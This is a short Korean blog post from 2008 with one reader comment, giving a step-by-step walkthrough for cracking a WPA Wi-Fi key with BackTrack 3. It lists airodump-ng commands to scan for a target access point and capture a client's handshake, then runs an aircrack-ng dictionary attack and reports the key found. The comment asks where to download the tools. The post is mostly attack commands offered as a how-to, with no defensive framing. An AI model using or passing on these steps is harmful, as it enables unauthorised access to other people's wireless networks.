2008년 7월 16일

WPA crack backtrack3

Backtrack3가 정식 release된뒤로 계속 post하고 있습니다.

airodump로 wpa를 사용하는 대상 ap를 검색합니다.

airodump-ng rausb0


찾은 ap와 client의 4way handshake를 dump합니다.
Client의 접속을 기다려야 됩니다.

airodump-ng --channel 2 --bssid target_ap_mac --write weak-net rausb0


WPA handshake가 포착되었다면.. 좋은 사전파일을 준비하여 aircrack-ng로 ditionary attack을 실시합니다.
aricrack-ng -w D8.DIC weak-net-01.cap


최종적으로 WPA-key를 찾았습니다.



댓글 1개:

익명 :

안녕하세요.
요즘 무선 인터넷의 WEP키 추출에 대해 공부를 진행중인 학생입니다.
airodump
aircrack
등의 파일을 다운받을 수 있는 경로가 있다면 정보 부탁드립니다.
euntae111@goo.mail.ne.jp
한글이 깨지네요.
가능하면 파일 형태의 답멜 부탁드립니다.